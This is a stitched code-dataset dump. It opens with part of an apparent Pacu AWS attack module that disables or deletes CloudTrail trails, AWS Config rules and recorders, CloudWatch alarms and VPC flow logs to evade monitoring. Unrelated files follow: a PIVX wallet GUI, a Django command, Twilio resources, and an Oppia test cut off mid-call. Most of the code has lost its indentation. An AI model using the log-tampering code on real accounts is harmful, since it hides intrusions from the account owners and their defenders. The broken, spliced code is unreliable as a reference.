if len(trails) > 0:
print("Starting CloudTrail...\n")
summary_data["cloudtrail"] = {
"disabled": 0,
"deleted": 0,
"minimized": 0,
}
for region in ct_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudtrail", region)
for trail in trails:
if trail["Region"] == region:
action = (
input(
" CloudTrail trail name: {}\n Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) ".format(
trail["Name"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.stop_logging(Name=trail["Name"])
print(
" Successfully disabled trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["disabled"] += 1
except Exception as error:
print(
" Could not disable trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "del":
try:
client.delete_trail(Name=trail["Name"])
print(
" Successfully deleted trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["deleted"] += 1
except Exception as error:
print(
" Could not delete trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "m":
try:
client.update_trail(
Name=trail["Name"],
SnsTopicName="",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=False,
EnableLogFileValidation=False,
CloudWatchLogsLogGroupArn="",
CloudWatchLogsRoleArn="",
KmsKeyId="",
)
print(
" Successfully minimized trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["minimized"] += 1
except Exception as error:
print(
" Could not minimize trail {}:\n {}\n".format(
trail["Name"], error
)
)
else:
print(" Skipping trail {}...\n".format(trail["Name"]))
print("CloudTrail finished.\n")
else:
print("No trails found. Skipping CloudTrail...\n")
if len(rules) > 0:
print("Starting Config rules...\n")
summary_data["awsconfig"] = {
"rules": {
"deleted": 0,
},
"recorders": {
"deleted": 0,
"stopped": 0,
},
"aggregators": {
"deleted": 0,
},
}
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for rule in rules:
if rule["Region"] == region:
action = (
input(
" Rule Name: {}\n Do you want to delete this rule? (y/n) ".format(
rule["ConfigRuleName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_config_rule(
ConfigRuleName=rule["ConfigRuleName"]
)
print(
" Successfully deleted rule {}!\n".format(
rule["ConfigRuleName"]
)
)
summary_data["awsconfig"]["rules"]["deleted"] += 1
except Exception as error:
print(
" Could not delete rule {}:\n {}\n".format(
rule["ConfigRuleName"], error
)
)
else:
print(
" Skipping rule {}...\n".format(
rule["ConfigRuleName"]
)
)
print("Config rules finished.\n")
else:
print("No rules found. Skipping Config rules...\n")
if len(recorders) > 0:
print("Starting Config recorders...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for recorder in recorders:
if recorder["Region"] == region:
action = (
input(
" Recorder Name: {}\n Do you want to stop (stop), delete (del), or skip (skip) this recorder? (stop/del/skip) ".format(
recorder["name"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully deleted recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["deleted"] += 1
except Exception as error:
print(
" Could not delete recorder {}:\n {}\n".format(
recorder["name"], error
)
)
elif action == "stop":
try:
client.stop_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully stopped recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["stopped"] += 1
except Exception as error:
print(
" Could not stop recorder {}:\n {}\n".format(
recorder["name"], error
)
)
else:
print(
" Skipping recorder {}...\n".format(recorder["name"])
)
print("Config recorders finished.\n")
else:
print("No recorders found. Skipping Config recorders...\n")
if len(aggregators) > 0:
print("Starting Config aggregators...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for aggregator in aggregators:
if aggregator["Region"] == region:
action = (
input(
" Aggregator Name: {}\n Do you want to delete this aggregator? (y/n) ".format(
aggregator["ConfigurationAggregatorName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_configuration_aggregator(
ConfigurationAggregatorName=aggregator[
"ConfigurationAggregatorName"
]
)
print(
" Successfully deleted aggregator {}!\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
summary_data["awsconfig"]["aggregators"]["deleted"] += 1
except Exception as error:
print(
" Could not delete aggregator {}:\n {}\n".format(
aggregator["ConfigurationAggregatorName"], error
)
)
else:
print(
" Skipping aggregator {}...\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
print("Config aggregators finished.\n")
else:
print("No aggregators found. Skipping Config aggregators...\n")
if len(alarms) > 0:
print("Starting CloudWatch alarms...\n")
summary_data["cloudwatch"] = {
"deleted": 0,
"disabled": 0,
}
for region in cw_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudwatch", region)
for alarm in alarms:
if alarm["Region"] == region:
action = (
input(
" Alarm Name: {}\n Do you want to disable the associated actions (dis), delete (del), or skip (s) this alarm? (dis/del/s) ".format(
alarm["AlarmName"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_alarms(AlarmNames=[alarm["AlarmName"]])
print(
" Successfully deleted alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["deleted"] += 1
except Exception as error:
print(
" Could not delete alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
elif action == "dis":
try:
client.disable_alarm_actions(
AlarmNames=[alarm["AlarmName"]]
)
print(
" Successfully disabled actions for alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["disabled"] += 1
except Exception as error:
print(
" Could not disable actions for alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
else:
print(
" Skipping alarm {}...\n".format(alarm["AlarmName"])
)
print("CloudWatch alarms finished.\n")
else:
print("No alarms found. Skipping CloudWatch...\n")
if len(flow_logs) > 0:
print("Starting VPC flow logs...\n")
summary_data["vpc"] = {"deleted": 0}
for region in vpc_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("ec2", region)
logs_to_delete = []
for log in flow_logs:
if log["Region"] == region:
action = (
input(
" Flow Log ID: {}\n Do you want to delete this flow log? (y/n) ".format(
log["FlowLogId"]
)
)
.strip()
.lower()
)
if action == "y":
logs_to_delete.append(log["FlowLogId"])
print(
" Added flow log {} to list of logs to delete.".format(
log["FlowLogId"]
)
)
else:
print(
" Skipping flow log {}...\n".format(log["FlowLogId"])
)
            if logs_to_delete:
                try:
                    response = client.delete_flow_logs(FlowLogIds=logs_to_delete)
                    print(
                        "      Attempt to delete all flow logs succeeded. Read the output for more information on any failures:\n        {}\n".format(
                            response
                        )
                    )
                    summary_data["vpc"]["deleted"] += len(logs_to_delete) - len(
                        response["Unsuccessful"]
                    )
                except Exception as error:
                    print(
                        "      Attempt to delete flow logs failed:\n        {}\n".format(
                            error
                        )
                    )
print("VPC flow logs finished.\n")
else:
print("No flow logs found. Skipping VPC...\n")
return summary_data
def summary(data, pacu_main):
out = ""
if "guardduty" in data:
out += " GuardDuty:\n"
out += " {} detector(s) disabled.\n".format(data["guardduty"]["disabled"])
out += " {} detector(s) deleted.\n".format(data["guardduty"]["deleted"])
if "cloudtrail" in data:
out += " CloudTrail:\n"
out += " {} trail(s) disabled.\n".format(data["cloudtrail"]["disabled"])
out += " {} trail(s) deleted.\n".format(data["cloudtrail"]["deleted"])
out += " {} trail(s) minimized.\n".format(data["cloudtrail"]["minimized"])
if "awsconfig" in data:
out += " AWSConfig:\n"
out += " Rules:\n"
out += " {} rule(s) deleted.\n".format(
data["awsconfig"]["rules"]["deleted"]
)
out += " Recorders:\n"
out += " {} recorder(s) deleted.\n".format(
data["awsconfig"]["recorders"]["deleted"]
)
out += " {} recorder(s) stopped.\n".format(
data["awsconfig"]["recorders"]["stopped"]
)
out += " Aggregators:\n"
out += " {} aggregator(s) deleted.\n".format(
data["awsconfig"]["aggregators"]["deleted"]
)
if "vpc" in data:
out += " VPC:\n"
out += " {} flow log(s) deleted.\n".format(data["vpc"]["deleted"])
return out
| true
| true
|
1c4481625ea42757e76faf57067bad00031d262c
| 6,458
|
py
|
Python
|
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os.path
sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))
from PyQt5.QtCore import Qt
from PyQt5.Qt import QLabel, QFormLayout, QDoubleSpinBox, QTableWidget, QTableWidgetItem, QAbstractItemView, QHeaderView,\
QCheckBox
from PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout,\
QProgressBar
from PyQt5.QtWidgets import QLineEdit, QComboBox
class TabRewards_gui(QWidget):
def __init__(self, *args, **kwargs):
QWidget.__init__(self)
self.initRewardsForm()
mainVertical = QVBoxLayout()
mainVertical.addWidget(self.rewardsForm)
buttonbox = QHBoxLayout()
buttonbox.addStretch(1)
buttonbox.addWidget(self.btn_Cancel)
mainVertical.addLayout(buttonbox)
self.setLayout(mainVertical)
def initRewardsForm(self):
self.collateralHidden = True
self.rewardsForm = QGroupBox()
self.rewardsForm.setTitle("Transfer Rewards")
layout = QFormLayout()
layout.setContentsMargins(10, 10, 10, 10)
layout.setSpacing(13)
layout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
##--- ROW 1
hBox = QHBoxLayout()
self.mnSelect = QComboBox()
self.mnSelect.setToolTip("Select Masternode")
hBox.addWidget(self.mnSelect)
label = QLabel("Total Address Balance")
label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
hBox.addWidget(label)
self.addrAvailLine = QLabel()
self.addrAvailLine.setToolTip("PIVX Address total balance")
self.addrAvailLine.setText("--")
hBox.addWidget(self.addrAvailLine)
self.btn_toggleCollateral = QPushButton("Show Collateral")
hBox.addWidget(self.btn_toggleCollateral)
hBox.setStretch(0,1)
hBox.setStretch(1,0)
hBox.setStretch(2,0)
layout.addRow(QLabel("Masternode"), hBox)
## --- ROW 2: REWARDS
self.rewardsList = QVBoxLayout()
self.rewardsList.statusLabel = QLabel('<b style="color:purple">Checking explorer...</b>')
self.rewardsList.statusLabel.setVisible(True)
self.rewardsList.addWidget(self.rewardsList.statusLabel)
self.rewardsList.box = QTableWidget()
self.rewardsList.box.setMinimumHeight(140)
#self.rewardsList.box.setMaximumHeight(140)
self.rewardsList.box.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.rewardsList.box.setSelectionMode(QAbstractItemView.MultiSelection)
self.rewardsList.box.setSelectionBehavior(QAbstractItemView.SelectRows)
self.rewardsList.box.setShowGrid(True)
self.rewardsList.box.setColumnCount(4)
self.rewardsList.box.setRowCount(0)
self.rewardsList.box.horizontalHeader().setSectionResizeMode(2, QHeaderView.Stretch)
self.rewardsList.box.verticalHeader().hide()
item = QTableWidgetItem()
item.setText("PIVs")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
item.setText("Confirmations")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
item.setText("TX Hash")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
item.setText("TX Output N")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.rewardsList.addWidget(self.rewardsList.box)
layout.addRow(self.rewardsList)
##--- ROW 3
hBox2 = QHBoxLayout()
self.btn_selectAllRewards = QPushButton("Select All")
self.btn_selectAllRewards.setToolTip("Select all available UTXOs")
hBox2.addWidget(self.btn_selectAllRewards)
self.btn_deselectAllRewards = QPushButton("Deselect all")
self.btn_deselectAllRewards.setToolTip("Deselect current selection")
hBox2.addWidget(self.btn_deselectAllRewards)
hBox2.addWidget(QLabel("Selected rewards"))
self.selectedRewardsLine = QLabel()
self.selectedRewardsLine.setMinimumWidth(200)
self.selectedRewardsLine.setStyleSheet("color: purple")
self.selectedRewardsLine.setToolTip("PIVX to move away")
hBox2.addWidget(self.selectedRewardsLine)
hBox2.addStretch(1)
self.swiftxCheck = QCheckBox()
self.swiftxCheck.setToolTip("check for SwiftX instant transaction (flat fee rate of 0.01 PIV)")
hBox2.addWidget(QLabel("Use SwiftX"))
hBox2.addWidget(self.swiftxCheck)
layout.addRow(hBox2)
##--- ROW 4
hBox3 = QHBoxLayout()
self.destinationLine = QLineEdit()
self.destinationLine.setToolTip("PIVX address to transfer rewards to")
hBox3.addWidget(self.destinationLine)
hBox3.addWidget(QLabel("Fee"))
self.feeLine = QDoubleSpinBox()
self.feeLine.setDecimals(8)
self.feeLine.setPrefix("PIV ")
self.feeLine.setToolTip("Insert a small fee amount")
self.feeLine.setFixedWidth(150)
self.feeLine.setSingleStep(0.001)
hBox3.addWidget(self.feeLine)
self.btn_sendRewards = QPushButton("Send")
hBox3.addWidget(self.btn_sendRewards)
layout.addRow(QLabel("Destination Address"), hBox3)
##--- ROW 5
hBox4 = QHBoxLayout()
hBox4.addStretch(1)
self.loadingLine = QLabel("<b style='color:red'>Preparing TX.</b> Completed: ")
self.loadingLinePercent = QProgressBar()
self.loadingLinePercent.setMaximumWidth(200)
self.loadingLinePercent.setMaximumHeight(10)
self.loadingLinePercent.setRange(0, 100)
hBox4.addWidget(self.loadingLine)
hBox4.addWidget(self.loadingLinePercent)
self.loadingLine.hide()
self.loadingLinePercent.hide()
layout.addRow(hBox4)
#--- Set Layout
self.rewardsForm.setLayout(layout)
#--- ROW 5
self.btn_Cancel = QPushButton("Clear/Reload")
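# A minimal sketch for eyeballing the widget above; it assumes PyQt5 is
# installed and that running this module directly is acceptable in the target
# setup (sys is already imported at the top of the file).
if __name__ == "__main__":
    from PyQt5.QtWidgets import QApplication

    app = QApplication(sys.argv)
    tab = TabRewards_gui()  # builds the rewards form plus the Clear/Reload button
    tab.show()
    sys.exit(app.exec_())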
| 45.478873
| 123
| 0.658873
|
import sys
import os.path
sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))
from PyQt5.QtCore import Qt
from PyQt5.Qt import QLabel, QFormLayout, QDoubleSpinBox, QTableWidget, QTableWidgetItem, QAbstractItemView, QHeaderView,\
QCheckBox
from PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout,\
QProgressBar
from PyQt5.QtWidgets import QLineEdit, QComboBox
class TabRewards_gui(QWidget):
def __init__(self, *args, **kwargs):
QWidget.__init__(self)
self.initRewardsForm()
mainVertical = QVBoxLayout()
mainVertical.addWidget(self.rewardsForm)
buttonbox = QHBoxLayout()
buttonbox.addStretch(1)
buttonbox.addWidget(self.btn_Cancel)
mainVertical.addLayout(buttonbox)
self.setLayout(mainVertical)
def initRewardsForm(self):
self.collateralHidden = True
self.rewardsForm = QGroupBox()
self.rewardsForm.setTitle("Transfer Rewards")
layout = QFormLayout()
layout.setContentsMargins(10, 10, 10, 10)
layout.setSpacing(13)
layout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
        hBox = QHBoxLayout()
self.mnSelect = QComboBox()
self.mnSelect.setToolTip("Select Masternode")
hBox.addWidget(self.mnSelect)
label = QLabel("Total Address Balance")
label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
hBox.addWidget(label)
self.addrAvailLine = QLabel()
self.addrAvailLine.setToolTip("PIVX Address total balance")
self.addrAvailLine.setText("--")
hBox.addWidget(self.addrAvailLine)
self.btn_toggleCollateral = QPushButton("Show Collateral")
hBox.addWidget(self.btn_toggleCollateral)
hBox.setStretch(0,1)
hBox.setStretch(1,0)
hBox.setStretch(2,0)
layout.addRow(QLabel("Masternode"), hBox)
        self.rewardsList = QVBoxLayout()
self.rewardsList.statusLabel = QLabel('<b style="color:purple">Checking explorer...</b>')
self.rewardsList.statusLabel.setVisible(True)
self.rewardsList.addWidget(self.rewardsList.statusLabel)
self.rewardsList.box = QTableWidget()
self.rewardsList.box.setMinimumHeight(140)
self.rewardsList.box.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.rewardsList.box.setSelectionMode(QAbstractItemView.MultiSelection)
self.rewardsList.box.setSelectionBehavior(QAbstractItemView.SelectRows)
self.rewardsList.box.setShowGrid(True)
self.rewardsList.box.setColumnCount(4)
self.rewardsList.box.setRowCount(0)
self.rewardsList.box.horizontalHeader().setSectionResizeMode(2, QHeaderView.Stretch)
self.rewardsList.box.verticalHeader().hide()
item = QTableWidgetItem()
item.setText("PIVs")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
item.setText("Confirmations")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
item.setText("TX Hash")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
item.setText("TX Output N")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.rewardsList.addWidget(self.rewardsList.box)
layout.addRow(self.rewardsList)
        hBox2 = QHBoxLayout()
self.btn_selectAllRewards = QPushButton("Select All")
self.btn_selectAllRewards.setToolTip("Select all available UTXOs")
hBox2.addWidget(self.btn_selectAllRewards)
self.btn_deselectAllRewards = QPushButton("Deselect all")
self.btn_deselectAllRewards.setToolTip("Deselect current selection")
hBox2.addWidget(self.btn_deselectAllRewards)
hBox2.addWidget(QLabel("Selected rewards"))
self.selectedRewardsLine = QLabel()
self.selectedRewardsLine.setMinimumWidth(200)
self.selectedRewardsLine.setStyleSheet("color: purple")
self.selectedRewardsLine.setToolTip("PIVX to move away")
hBox2.addWidget(self.selectedRewardsLine)
hBox2.addStretch(1)
self.swiftxCheck = QCheckBox()
self.swiftxCheck.setToolTip("check for SwiftX instant transaction (flat fee rate of 0.01 PIV)")
hBox2.addWidget(QLabel("Use SwiftX"))
hBox2.addWidget(self.swiftxCheck)
layout.addRow(hBox2)
        hBox3 = QHBoxLayout()
self.destinationLine = QLineEdit()
self.destinationLine.setToolTip("PIVX address to transfer rewards to")
hBox3.addWidget(self.destinationLine)
hBox3.addWidget(QLabel("Fee"))
self.feeLine = QDoubleSpinBox()
self.feeLine.setDecimals(8)
self.feeLine.setPrefix("PIV ")
self.feeLine.setToolTip("Insert a small fee amount")
self.feeLine.setFixedWidth(150)
self.feeLine.setSingleStep(0.001)
hBox3.addWidget(self.feeLine)
self.btn_sendRewards = QPushButton("Send")
hBox3.addWidget(self.btn_sendRewards)
layout.addRow(QLabel("Destination Address"), hBox3)
        hBox4 = QHBoxLayout()
hBox4.addStretch(1)
self.loadingLine = QLabel("<b style='color:red'>Preparing TX.</b> Completed: ")
self.loadingLinePercent = QProgressBar()
self.loadingLinePercent.setMaximumWidth(200)
self.loadingLinePercent.setMaximumHeight(10)
self.loadingLinePercent.setRange(0, 100)
hBox4.addWidget(self.loadingLine)
hBox4.addWidget(self.loadingLinePercent)
self.loadingLine.hide()
self.loadingLinePercent.hide()
layout.addRow(hBox4)
self.rewardsForm.setLayout(layout)
self.btn_Cancel = QPushButton("Clear/Reload")
| true
| true
|
1c44828ab8ac3c3d9d148eb2ff2de1a5e2d9b4cb
| 611
|
py
|
Python
|
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | 1
|
2018-12-18T06:07:39.000Z
|
2018-12-18T06:07:39.000Z
|
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | null | null | null |
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# -*- coding:utf-8 -*-
from django.core.management.base import BaseCommand
from httprunner import logger
from FasterRunner.__about__ import __version__
class Command(BaseCommand):
def add_arguments(self, parser):
""" API test: parse command line options and run commands.
"""
parser.add_argument(
'-V', '--Version', dest='version', action='store_true',
help="show version")
def handle(self, *args, **options):
if options['version']:
logger.color_print("{}".format(__version__), "GREEN")
exit(0)
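# A minimal sketch of exercising the command's parser directly, mirroring what
# `python manage.py cli -V` does; "manage.py" and "cli" are the usual Django
# prog/subcommand placeholders, assumed here for illustration.
if __name__ == "__main__":
    cmd = Command()
    demo_parser = cmd.create_parser("manage.py", "cli")
    demo_options = vars(demo_parser.parse_args(["-V"]))
    print(demo_options["version"])  # True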
| 26.565217
| 67
| 0.621931
|
from django.core.management.base import BaseCommand
from httprunner import logger
from FasterRunner.__about__ import __version__
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument(
'-V', '--Version', dest='version', action='store_true',
help="show version")
def handle(self, *args, **options):
if options['version']:
logger.color_print("{}".format(__version__), "GREEN")
exit(0)
| true
| true
|
1c4482d3efed66b2dcba6ba7a251c16ecf685d36
| 1,606
|
py
|
Python
|
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | 3
|
2015-07-04T07:23:32.000Z
|
2016-04-06T21:51:37.000Z
|
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | null | null | null |
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | 8
|
2015-07-04T07:24:08.000Z
|
2020-04-27T02:23:49.000Z
|
from twilio.rest.resources.util import normalize_dates
from twilio.rest.resources import InstanceResource, ListResource
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
"""
Return a list of :class:`Transcription` resources
"""
return self.get_instances(kwargs)
class Recording(InstanceResource):
subresources = [Transcriptions]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
"""
Delete this recording
"""
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, before=None, after=None, **kwargs):
"""
Returns a page of :class:`Recording` resources as a list.
For paging information see :class:`ListResource`.
:param date after: Only list recordings logged after this datetime
:param date before: Only list recordings logger before this datetime
:param call_sid: Only list recordings from this :class:`Call`
"""
kwargs["DateCreated<"] = before
kwargs["DateCreated>"] = after
return self.get_instances(kwargs)
def delete(self, sid):
"""
Delete the given recording
"""
return self.delete_instance(sid)
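# Usage sketch (assumption: `client` is a configured twilio REST client exposing
# `client.recordings`; names outside this file are illustrative):
#   from datetime import date
#   for recording in client.recordings.list(after=date(2015, 1, 1)):
#       print(recording.formats["mp3"])  # direct-download URI built in Recording.__init__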
| 25.09375
| 76
| 0.625156
|
from twilio.rest.resources.util import normalize_dates
from twilio.rest.resources import InstanceResource, ListResource
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
return self.get_instances(kwargs)
class Recording(InstanceResource):
subresources = [Transcriptions]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, before=None, after=None, **kwargs):
kwargs["DateCreated<"] = before
kwargs["DateCreated>"] = after
return self.get_instances(kwargs)
def delete(self, sid):
return self.delete_instance(sid)
| true
| true
|
1c44840024dc6589b681daa749547890a83a74f1
| 72,269
|
py
|
Python
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 2
|
2020-03-28T18:32:45.000Z
|
2021-02-07T18:29:31.000Z
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 35
|
2019-02-23T20:31:21.000Z
|
2019-08-19T12:32:13.000Z
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:20:56.000Z
|
2021-01-28T05:20:56.000Z
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for suggestion controllers."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import fs_domain
from core.domain import opportunity_services
from core.domain import question_domain
from core.domain import question_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import skill_services
from core.domain import state_domain
from core.domain import story_domain
from core.domain import story_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
(suggestion_models, feedback_models) = models.Registry.import_models([
models.NAMES.suggestion, models.NAMES.feedback])
class SuggestionUnitTests(test_utils.GenericTestBase):
IMAGE_UPLOAD_URL_PREFIX = '/createhandler/imageupload'
ASSET_HANDLER_URL_PREFIX = '/assetsdevhandler'
EXP_ID = 'exp1'
TRANSLATION_LANGUAGE_CODE = 'en'
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
TRANSLATOR_EMAIL = 'translator@example.com'
NORMAL_USER_EMAIL = 'user@example.com'
def setUp(self):
super(SuggestionUnitTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.AUTHOR_EMAIL_2, 'author2')
self.signup(self.NORMAL_USER_EMAIL, 'normalUser')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.signup(self.TRANSLATOR_EMAIL, 'translator')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.author_id_2 = self.get_user_id_from_email(self.AUTHOR_EMAIL_2)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.translator_id = self.get_user_id_from_email(self.TRANSLATOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
self.EXP_ID, self.editor_id, ['State 1', 'State 2', 'State 3'],
['TextInput'], category='Algebra'))
self.old_content = state_domain.SubtitledHtml(
'content', '<p>old content html</p>').to_dict()
exploration.states['State 1'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 2'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 3'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exp_services._save_exploration(self.editor_id, exploration, '', []) # pylint: disable=protected-access
rights_manager.publish_exploration(self.editor, self.EXP_ID)
rights_manager.assign_role_for_exploration(
self.editor, self.EXP_ID, self.owner_id, rights_domain.ROLE_EDITOR)
self.new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
self.resubmit_change_content = state_domain.SubtitledHtml(
'content', '<p>resubmit change content html</p>').to_dict()
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 1',
}, csrf_token=csrf_token)
self.logout()
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
